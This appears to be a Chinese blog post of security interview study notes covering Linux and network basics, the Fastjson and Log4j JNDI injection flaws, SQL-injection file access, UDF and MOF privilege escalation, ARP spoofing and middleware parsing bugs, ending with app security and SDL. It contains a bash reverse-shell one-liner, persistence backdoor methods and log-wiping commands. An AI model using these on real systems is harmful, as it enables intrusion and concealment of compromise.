知识点(杂)

1.java反射机制:是指程序在运行状态中,对任意一个类都知道这个类的所有属性和方法,并且对于任意对象,都能调用它的方法,
这种动态获取信息和调用的功能称为反射

2.linux进程内存布局:保留区、数据段、堆、栈、内核空间

3.tcpdump的抓包命令:tcpdump -i eth0 host ip

4.32位寄存器有几个,是那些:数据寄存器EAX、EBX、ECX、EDX, 变址寄存器ESI、EDI,指针寄存器EBP、ESP

5.TCP报文由首部和数据部分组成,其中首部包括:源端口、目的端口、序号、确认号等组成

6.tcp/ip协议:应用层(http,ftp)、传输层(tcp,udp)、网络层(ip,arp)、网络接口层(以太网)

7.Linux内核由五个子系统组成:进程调度、内存管理、虚拟文件系统、网络接口、进程通信
 
8.Linux的日志存放位置:日志文件通常会保存在/var/log目录下

9.Linux权限操作:u:user文件所有者,g:所有者同组用户,o:表示others,给其它用户设置权限
#chmod u+r,g+w,o+x log.txt   数字形式 r:4,w:2,x:1 #chmod 777 log.txt

10.Linux的管道符|,分割两边的命令,左边命令的输出作右边命令的输入

11.linux的shell
shell即是命令语言,又是一种程序设计语言
Linux中的shell,是指一个面向用户的命令接口,它接收用户输入的命令并把它送入内核去执行

12.环境变量
环境变量是指操作系统运行环境的一些参数
如果我们想让自己的命令能被系统找到,就需要把命令所在的目录加到环境变量里面

13.Linux怎么启动定时任务:crontab -e(编辑定时任务)或者直接编辑/etc/crontab文件

14.fastjson漏洞
FastJson在解析json的过程中,其中@type可以指定反序列化任意类调用其set,get,可构造出一些恶意利用链。
JdbcRowSetImpl 这个类lookup方法中的getDataSoureceName可控
攻击者可以传入危险类,并将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,
JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE。
攻击者在本地启一个rmi的服务器,上面挂上恶意的payload
让被攻击的目标反序列化特定的类,这个类最终会调用lookup()函数,导致jndi接口指向攻击者的rmi服务器上的恶意payload

JNDI 服务器使用 RMI方式
RMI是专为 JAVA 环境设计的远程方法调用机制
JNDI是Java命令和目录接口,提供了查找各种命令和目录服务的统一的接口

防御
升级JDK版本
升级最新版本
checkAutoType(黑名单列表)
使用safemode机制,完全禁用autoType

15.log4j漏洞
Log4j将输出的日志拼接成字符串之后,它会去判断字符串中是否包含${和}
如果包含了会将内容和lookups的map做匹配,如果日志中有jndi,那就会去调用JndiLookup方法
这样就产生了jndi注入的rce漏洞

防御
修改参数NoLookups=true
禁用 log4j 的 lookup 功能
禁止 log4j 连接外网

16.SQL注入之文件操作
读文件使用load_file("路径/文件名")
写文件使用 into outfile("路径/文件名")

17.UDF提权
udf用户自定义函数,是对mysql功能的扩展
1.将udf文件放到指定位置(Mysql>5.1放在Mysql根目录的lib\plugin文件夹下,mysql<5.1放到\windows\system32)
2.从udf文件中引入自定义函数(user defined function)
3.执行自定义函数

18.MOF提权
原理
利用了C:\Windows\System32\wbem\MOF目录下的nullevt.mof文件
利用该文件每分钟会去执行一次的特性,向该文件中写入cmd命令,就会被执行
将带修改过带有命令执行的mof文件上传,然后系统就会执行

19.bash反弹shell
#bash -i >& /dev/tcp/127.0.0.1/8888 0>&1
 -i  创建一个交互式的shell.
0,stdin,标准输入(一般是键盘)
1,stdout,标准输出(一般是显示屏,准确的说是用户终端控制台)

20.ARP欺骗
当一个设备要发送数据到另一个设备,会通过广播的形式,发送一个ARP请求,询问局域网中的设备,是否由指定ip对应的mac地址,
然后攻击者会伪造ARP包,将含有其它设备的ip和自己的mac地址发给受害者,受害者收到ARP包之后
,会更新ARP缓存表,这样攻击者就数据能劫持受害者数据

21.常见的中间件解析漏洞iis6、nginx、apache
IIS6、(1)目录解析形式:www.xxx.com/xx.asp/xx.jpg
原理: 服务器默认会把.asp目录下的文件都解析成asp文件
(2)文件解析
形式:www.xxx.com/xx.asp;.jpg
原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

nginx、(1)xxx.jpg%00.php (Nginx <8.03 空字节代码执行漏洞)


Apache、(1)APACHE配置文件漏洞
Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。
比如 test.php.war  ”.rar” 这种后缀是apache不可识别解析,apache就会把test.php.owf.rar解析成php。
漏洞形式
www.xxxx.xxx.com/test.php.php123


22.linux怎么提权,有那些提权方式
内核提权
先uname -a 命令来查看内核版本,然后去exp db库去找对应的提权方式(脏牛内核漏洞提权)
定时任务提权
/etc/crontab 
系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。

linux权限维持
1添加用户
useradd
passwd 
2ssh软链接
3利用定时任务反弹shell

Windows怎么提权,有那些提权方式
1、msf的getsystem提权
2、利用bypass UAC模块进行提权
3、systeminfo补丁提权
4、第三方软件或服务提权udf

Windows权限维持
新建一个用户
注册表设置启动后门
计划任务设置后门
建立一个服务自启动后门

23.入侵痕迹清理
(1)Window、应用程序日志、安全日志、系统日志
(2)Linux、清除history命令记录 history -c
清除系统日志痕迹/var/log/下的日志

app安全https://zhuanlan.zhihu.com/p/381059150
APP安全分为四个方面
1、应用安全
二进制安全(反注入、反调试)、敏感数据安全(有没有URL或ip地址和密钥的硬编码、app中存储的敏感数据做加密保护,是否有使用不安全的加密算法如md5/des)
app做完整性校验(以防止app被篡改后植入恶意代码)、app中是否包含明文存储的数字证书文件

2、组件安全
Activity组件暴露 ,可以被第三方应用任意调用,导致敏感信息泄露(exported属性设置为false)

3、运行安全
打印的日志信息是否含有用户敏感信息;敏感数据不要存在SD卡上

4、通信安全
是否使用htpp、Htpps未校验服务器证书风险、https通信是否使用安全的加密套件

SDL安全开发流程
1.培训:对开发团队的人员进行安全培训(安全意识,编码规范)
2.制定安全要求和项目计划(DI值)
3.确定设计要求(安全和隐私的Checklist),分析安全特性,分析攻击面和威胁建模(识别威胁、消减措施)
仿冒(S)、篡改(T)、抵赖(R)、信息泄露(I)、拒绝服务(D)、权限提升(E)
4.代码静态扫描、白盒审计
5.进行安全测试(渗透测试、fuzz测试)
6.迭代版本,修复漏洞

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值